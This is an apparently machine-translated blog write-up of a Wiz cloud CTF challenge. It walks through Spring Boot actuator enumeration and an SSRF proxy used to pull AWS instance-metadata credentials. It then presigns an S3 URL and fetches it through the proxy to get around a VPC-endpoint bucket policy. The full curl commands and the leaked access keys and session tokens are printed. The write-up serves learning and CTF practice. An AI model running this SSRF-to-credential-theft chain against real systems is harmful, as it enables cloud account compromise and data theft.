Study address:The Ultimate Cloud Security Championship
introduce
WIZ is a company that everyone is familiar with. It is a cloud native security giant and a palace of cloud research and learning. Every year, a new online cloud CTF competition is created like Cyber Buddha. This year, the competition is held for several months. Naturally, I will not miss any issue. Next, I will study this issue. The theme is:Perimeter Leak
Chinese translation:Peripheral vulnerabilitiesFrom this, we can guess the attack ideas: edge, bypass, and privilege escalation. In fact, this is also the consistent use method of cloud problems.
What we looked at:
Seeing this we can get two more points:
s3→It may be a storage flag, but of course certain credentials must be obtained→Permission elevation
Spring Boot → Spring Boot and cloud, the first thing that comes to mind is the Spring Boot env leak, which contains key tokens and so on. (But before, I wanted to ask a certain expert for advice: "Spring Boot memory leaks are difficult to foresee in actual combat. It is only one in a thousand, but once encountered, it is often extremely harmful.") So friends, you should not let it go when you encounter Spring Boot.
Research
Through the above information, we already have similar attack ideas.
First we understand somethingSpring Boot’s Actuator endpoint(There are many online, click on the bold keywords on the left to search)
Let’s look directly at /actuator/env. The output contains a lot of useless content. We mainly focus on the following ones:
user@monthly-challenge:~$ curl https: //ctf:[email protected]/actuator/env
"java.class.path": {
"value": "/home/ec2-user/spring-boot/target/spring-boot-0.0.1-SNAPSHOT.jar"
},
"user.name": {
"value": "ec2-user"
},
"INVOCATION_ID": {
"value": "cb49fb685ed2497eb60672956106753c",
"origin": "System Environment Property "INVOCATION_ID""
},
"HOME": {
"value": "/home/ec2-user",
"origin": "System Environment Property "HOME""
},
"BUCKET": {
"value": "challenge01-470f711",
"origin": "System Environment Property "BUCKET""
},
Successfully found the S3 address. Visit to see
If the permissions are not enough, it seems we have to findSpring Boot’s Actuator endpointOkay, let’s do a semi-automatic batch search to see what information there is.
/actuator/heapdump → 404
/heapdump → 404
/threaddump → 404
/mappings → 404
/actuator/mappings → The content is right, here are some information that looks useful
"patterns": [
"/actuator/info"
],"predicate": "{GET [/actuator/threaddump], produces [text/plain;charset=UTF-8]}",
{
"predicate": "{ [/proxy], params [url]}",
"handler": "challenge.Application#proxy(String)",
"details": {
"handlerMethod": {
"className": "challenge.Application",
"name": "proxy",
"descriptor": "(Ljava/lang/String;)Ljava/lang/String;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [],
"params": [
{
"name": "url",
"negated": false
}
],
"patterns": [
"/proxy"
],
"produces": []
}
}
The proxy interface, parameter url, is obviously an ssrf. We also knew earlier that this application is running on EC2, so we naturally thought of ssrf → instance metadata service.
curl "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/”HTTP error: 401 Unauthorized
Again, the permissions are not enough. Let’s explore other paths.
curl "https://ctf:[email protected]://169.254.169.254/latest/api/token"
HTTP error: 405 Not AllowedSubsequently, MCP searched the AWS knowledge base to get the official explanation of the bypass method.
Use the Instance Metadata Service to access instance metadata - Amazon Elastic Compute Cloud
One is version bypass and the other is token utilization.
TOKEN=$(curl -X PUT "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") &&
curl -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 56 100 56 0 0 351 0 --:--:-- --:--:-- --:--:-- 352
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/为了方便的话可以把token写入变量:
TOKEN=curl -X PUT "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
Analyze the information again
iam/ user configuration information (after curl access, it is found that there is security-credentials authentication)
identity-credentials/ authentication
Get certification separately
curl -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"challenge01-5592368
curl -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:[email protected]/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368"
{
"Code" : "Success",
"LastUpdated" : "2025-07-02T13:38:17Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARK7LBOHXLKWZ7WTF",
"SecretAccessKey" : "7tqURWdkmfXW2W7mK6IbKB5mu/sAmMXfokuGoaWH",
"Token" : "IQoJb3JpZ2luX2VjEPb//////////wEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr+VxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI+Pqf9R0iq21EakTDZMqwQUI7///////////ARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO+FRmP7GrJtvQKRphYddMjXSRtLkbNYG+2drmhmhqCvEjc+fz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB/WqTMREyijnkOhmvA/7WyYdtWBAF5OcJ+K6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC/cUQr013Tn/yLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq/4rab+QvQaDe7z0VmF+XIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f+sUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj+HbxvJaKfDkHdD64cwWMvP/5LOeMqtGsKbLY+4Cqs78aMA/xu3cBDfTtcN38o8Ui8473GQl+/IMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR+Y37GNg24B27jJbRo8LIjP7ReFRrPul4eN/qjI8LTGk6t+cQmEdNZMlcYJysPpc5nyeNf42f4P6/lg858YSsuqDMEjg/r5O0KenO/Bq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW/SONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf+Uuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl+Bh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx+M/v1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL/Wne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me+yM7ifWGbga25nmTkCg6d1+zpfAWqj/Jtb4=",
"Expiration" : "2025-07-02T19:40:17Z"
url -H "X-aws-ec2-metadata-token: $TOKEN" "https://ctf:88sPVWyC2e01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
{
"Code" : "Success",
"LastUpdated" : "2025-07-02T13:39:19Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARK7LBOHXB3CPPMKE",
"SecretAccessKey" : "BNlxMBEkWgl1B5jiIvgAV9PVM9RdzA22esYgxnnV",
"Token" : "IQoJb3JpZ2luX2VjEPb//////////wEaCXVzLWVhc3QtMSJGMEQCIGmgLc6imtoUFec0nsssCY0TESJZGu0g/yKRiEf38tn4AiAjYvIovN8WSAdD1/4rUsMCrkkRnXGzWcCQ6iWK2c3nNirPBAjv//////////8BEAAaDDA5MjI5Nzg1MTM3NCIMbH3XEXTFgpVAxic7KqMEYk7GNoovjR7LoF3lP/jJRjnpvOT0Rbxs2cuOo3wIYecgbQJdGs9F3BHswYH1ygVmVHwbVZXjekfdaaVbPacvCa2M6rfc1lR9H5ycrP5IB0mRi7QQWSvOKbp+haRF9Rtd+12EbWZFposn+rQPxKgZRChXxE9mVfOEWxkSUAjEuY7nnXpGE0x5tMvilB/8UfHLBy6WLvBfjZVpe6zuhDgfJQix12a2WxWfOyhaIqjiNhbdthigR6sjgD7z8eh3YMDiSVOmUeARh4vWblnRyfwH5Znyyl4okRZnxpC8U8i7dI8zDmDf18ARbXNB6Z1wUSboiQKlZZz93diGWsMyj03tmY/9vv4WtQ4XSXrlLQSzkuOnG98doJtIZ6YH0J3oSH1XOR14XxWd7RJ/jenb0yd/vgENqm8TUn9ZqBHdTwAtNN8jDgk2VEG3zBuCw2HXNfL8wc6KogPxoBkXVNz7DQeYdJA+BC9+LZsdqx1V+zMV+I07dXSVHhyOqPW7xuRNWWDlcvSnlBm+k4fIsyQbjlaTknZgJK+ImYhHA06mVGf6ykf6TOdjuFlIsxMY4Ej0psTLGIIxLp0AKDfzJAvaQdpQCVYZOTYnRWdi+BG41Q49iPiEn6Y6PR4GkTA5RXEdAcohwsbRx4bTLu/Ww0I1wF0WRlNIp8680HKUtnKi3OkDHr2i0x4/yEocGi5Z/r25ToHXf5itBSf+QZ9Cts4QirTmBGGWWzDt7JTDBjqUAv358q/q8XvlRsh2NU1JYG1LVxJWxZ/lsUKp8RHwNc/hV2V3pj3REiHkdlMY3ADJLplBwffWcJBD1WGhyakHBA5eX8bQRmoN7Ppr37wJfpko1pgpapQX2HbvS5G5Rjz0P0Ge7Iq+eVxx6weh6KzesI48xl1YkbSlZb0c8Y64EEHge6D//DDzM7QUlPhdeerUXhx0XFpqCuCwimY92miTGoDDa+7u1tsu6MCOybicJWc3bNF7PAwlAfgOPY6oHCdTM2BnxPrJY2H5OuHHRT0amgRInOmlsiaWO4SYVomiRe2wlDHBLruDHlG0h/I8G4Dl1PSPwnN7bcy3R60r9O+PRUpeN+zSSJKUnTKBVyGEMt5RtGJ6oA==",
"Expiration" : "2025-07-02T20:08:18Z"
The following two token values are also different.
/identity-credentials/ec2/security-credentials/ec2-instance
/iam/security-credentials/challenge01-5592368
aws config authenticates the token. Let’s check the difference in permissions between them.
export AWS_ACCESS_KEY_ID=ASIARK7LBOHXLKWZ7WTF
export AWS_SECRET_ACCESS_KEY=7tqURWdkmfXW2W7mK6IbKB5mu/sAmMXfokuGoaWH
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEPb... (这里使用第一个完整的 Token)aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279"
}
没有查看自身权限的权限:
aws iam list-attached-role-policies --role-name challenge01-5592368
An error occurred (AccessDenied) when calling the ListAttachedRolePolicies operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: iam:ListAttachedRolePolicies on resource: role challenge01-5592368 because no identity-based policy allows the iam:ListAttachedRolePolicies action
Later I found out that ec2-instance is actually our current user and no further testing is needed.
We directly use the token of challenge01-5592368-
aws s3 ls s3://challenge01-470f711 --recursive2025-06-18 11:15:24 29 hello.txt
2025-06-16 16:01:49 51 private/flag.txt
There is a flag, but the test found that the permissions are not available:
aws s3 cp s3://challenge01-470f711/private/flag.txt -download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden
Check out the bucket policy:
aws s3api get-bucket-policy --bucket challenge01-470f711
--query "Policy" --output text | jq .The core functions of this strategy are:Protectprivate/folder. itrejectAll frompublic internetorUntrusted network locationrequest to download the files in this folder. Only through oneSpecific, internal AWS network channel (VPC Endpoint)Access is only allowed if the request is made.
what can we do nextThe next task is:Find a way to make my AWS requestEmitted from this specific VPC endpoint. This usually means I need:
Locate an EC2 instance within the VPC associated with this VPC endpoint.
Find a way to execute the command on that EC2 instance. (to satisfy)
Or find another way to make requests from within the VPC (for example, a Lambda function). (No question given)
aws --profile c1 ec2 describe-vpc-endpoints An error occurred (UnauthorizedOperation) when calling the DescribeVpcEndpoints operation: You are not authorized to perform this operation. User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: ec2:DescribeVpcEndpoints because no identity-based policy allows the ec2:DescribeVpcEndpoints action
Still don’t have permission, let’s statistically analyze the information we may use:
All external network requests seem to have to go through a proxy server:
https://ctf:[email protected]/proxy
The VPC where the EC2 instance is located has a "VPC Endpoint" connected to S3
It seemshttps://ctf:[email protected]/proxy vpc, combining these two points, we have to find a way to use it through curl.https://ctf:[email protected]/proxyForward to connect to s3
SummarizeStrategy:
Since it is not possible to directly access the
curlS3 address, then a presigned URL (Presigned URL) is generated.
This pre-signed URL contains temporary access credentials.
Then, through that proxy
curlThis pre-signed URL.
because
curlThe command is issued from the EC2 instance, so network traffic should be intelligently routed through the VPC endpoint to S3.
aws s3 presign s3://challenge01-470f711/private/flag.txt
https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXLKWZ7WTF%2F20250702%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250702T145857Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEPb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr%2BVxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI%2BPqf9R0iq21EakTDZMqwQUI7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO%2BFRmP7GrJtvQKRphYddMjXSRtLkbNYG%2B2drmhmhqCvEjc%2Bfz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB%2FWqTMREyijnkOhmvA%2F7WyYdtWBAF5OcJ%2BK6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC%2FcUQr013Tn%2FyLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq%2F4rab%2BQvQaDe7z0VmF%2BXIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f%2BsUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj%2BHbxvJaKfDkHdD64cwWMvP%2F5LOeMqtGsKbLY%2B4Cqs78aMA%2Fxu3cBDfTtcN38o8Ui8473GQl%2B%2FIMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR%2BY37GNg24B27jJbRo8LIjP7ReFRrPul4eN%2FqjI8LTGk6t%2BcQmEdNZMlcYJysPpc5nyeNf42f4P6%2Flg858YSsuqDMEjg%2Fr5O0KenO%2FBq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW%2FSONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf%2BUuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl%2BBh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx%2BM%2Fv1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL%2FWne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me%2ByM7ifWGbga25nmTkCg6d1%2BzpfAWqj%2FJtb4%3D&X-Amz-Signature=3390210270e1988d036afc766e6717222f99867a85ee41a121f8a4511cebba1dTry querying it from a proxy server
curl "https://ctf:[email protected]/proxy?url=https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXLKWZ7WTF%2F20250702%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250702T145857Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEPb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr%2BVxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI%2BPqf9R0iq21EakTDZMqwQUI7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO%2BFRmP7GrJtvQKRphYddMjXSRtLkbNYG%2B2drmhmhqCvEjc%2Bfz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB%2FWqTMREyijnkOhmvA%2F7WyYdtWBAF5OcJ%2BK6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC%2FcUQr013Tn%2FyLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq%2F4rab%2BQvQaDe7z0VmF%2BXIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f%2BsUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj%2BHbxvJaKfDkHdD64cwWMvP%2F5LOeMqtGsKbLY%2B4Cqs78aMA%2Fxu3cBDfTtcN38o8Ui8473GQl%2B%2FIMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR%2BY37GNg24B27jJbRo8LIjP7ReFRrPul4eN%2FqjI8LTGk6t%2BcQmEdNZMlcYJysPpc5nyeNf42f4P6%2Flg858YSsuqDMEjg%2Fr5O0KenO%2FBq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW%2FSONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf%2BUuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl%2BBh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx%2BM%2Fv1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL%2FWne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me%2ByM7ifWGbga25nmTkCg6d1%2BzpfAWqj%2FJtb4%3D&X-Amz-Signature=3390210270e1988d036afc766e6717222f99867a85ee41a121f8a4511cebba1d"HTTP error: 400 Bad Request
URL encoding problem, you need toInner URL(fromhttps://starting with the entire S3 address) to fully URL encode
curl "https://ctf:[email protected]/proxy?url=https%3A%2F%2Fchallenge01-470f711.s3.amazonaws.com%2Fprivate%2Fflag.txt%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DASIARK7LBOHXLKWZ7WTF%252F20250702%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20250702T145857Z%26X-Amz-Expires%3D3600%26X-Amz-SignedHeaders%3Dhost%26X-Amz-Security-Token%3DIQoJb3JpZ2luX2VjEPb%252F%252F%252F%252F%252F%252F%252F%252F%252F%252FwEaCXVzLWVhc3QtMSJHMEUCIQDmRWlas5PfxeabBVhIImQZkEHOxVGX7yr%252BVxWQzI1ohgIgBNbmiTDHYumAbfTRYSqSMrDBI%252BPqf9R0iq21EakTDZMqwQUI7%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252FARAAGgwwOTIyOTc4NTEzNzQiDCaCiJnJPCeTrhYUjSqVBRO%252BFRmP7GrJtvQKRphYddMjXSRtLkbNYG%252B2drmhmhqCvEjc%252Bfz6b3wneYuFM6TlZkIAJ2u4Yiug64FKxBBGppzRVG0Zd98qT5DEu8rOvb4opvA17V36KHeAaC9TOwB%252FWqTMREyijnkOhmvA%252F7WyYdtWBAF5OcJ%252BK6doEOp7bvZOZVTr5yD8xUR7yypbyfBrSrxRkQQe9iITzHQluafBdGwarqky4W1YsyVhplC%252FcUQr013Tn%252FyLxH66lLCF4qANd196OBm4CTBnTmTz8AshwhGAq%252F4rab%252BQvQaDe7z0VmF%252BXIaCLy3mZaK1Varj4fLv88fk6GDy8OWs5DdJ9wisdavF35f%252BsUZJJzRN4WiwYZWcMgG4YDidyukGlE8drIYFhvljdfKqKhkLjopoJclNCSFtqbnXyZ0K402txq4Pj%252BHbxvJaKfDkHdD64cwWMvP%252F5LOeMqtGsKbLY%252B4Cqs78aMA%252Fxu3cBDfTtcN38o8Ui8473GQl%252B%252FIMWkI79bpfsrUAyy7GrF5fWFKH69oAN1zwIHYX4rR%252BY37GNg24B27jJbRo8LIjP7ReFRrPul4eN%252FqjI8LTGk6t%252BcQmEdNZMlcYJysPpc5nyeNf42f4P6%252Flg858YSsuqDMEjg%252Fr5O0KenO%252FBq3DjCAcTotfSebMJ0GHagJbdEtIuZSE9m6dnoDjr7BpW%252FSONot4m2TPkSMeZW4Dp0DZ9XAvr3dG8DidfKBI2BedIikRy0SkV3lPALIWV0J7ijyDQ4866uIkevw81pmMt0Espuphwz9kZ27LRE34nf%252BUuu6EHDIpNFFdi9JTDPXE96VDGHsI18LuhR41eFHoi425tUtl%252BBh2jIb9HtrnzWiUo7TK8lXb0cTk3z1vGhi5ICP7FuYw7eyUwwY6sQHXJI6rDVt8SM3zfggHkE0UzpPxcxcVDx%252BM%252Fv1n3fbqxNskFe9HsseCpjPjxqfndYAQO2xM5bOgziMDQasCngjBw7MFWfQVVllf6WlIJOn7zHTLkL%252FWne7uHC1XNUs8NEVByWaluffrUx25Ij6A4sNkF5xBRHNTwHma6Atpu1ST74bwv0qOJZz9FieruK6QITxob7PeV5me%252ByM7ifWGbga25nmTkCg6d1%252BzpfAWqj%252FJtb4%253D%26X-Amz-Signature%3D3390210270e1988d036afc766e6717222f99867a85ee41a121f8a4511cebba1d"
The flag is: WIZ_CTF_Presigned_Urls_xxxxxOK flag, guys, go and collect it.
Expand additional knowledge:
AWS S3 signing method
AWS S3 uses a signature mechanism to verify the legitimacy of API requests and pre-signed URLs, ensuring that only authorized users can access the bucket and its objects. There are mainly three signature methods:Signature Version 2 (SigV2)、Signature Version 4 (SigV4)andSignature Version 4A (SigV4A). SigV2 is an older mechanism based on the HMAC-SHA1 algorithm, which is simple but less secure. It has been phased out and is only used in older systems or compatibility scenarios. SigV4 is a standard recommended by AWS. It uses the HMAC-SHA256 algorithm, supports all regions and services, and contains information such as timestamps and regions to prevent replay attacks. It is often used in modern API requests and pre-signed URLs (such as the scenario of accessing S3 through a proxy in this article). SigV4A is an extension of SigV4 and is designed for multi-region access (such as S3 Multi-Region Access Points). It uses the AWS4-ECDSA-P256-SHA256 or AWS4-HMAC-SHA256 algorithm and is suitable for cross-region replication and other scenarios, but the support range is narrow. SigV4 has become the mainstream signature method for AWS S3 due to its high security and wide applicability.
Comments (0)
Login to post a comment.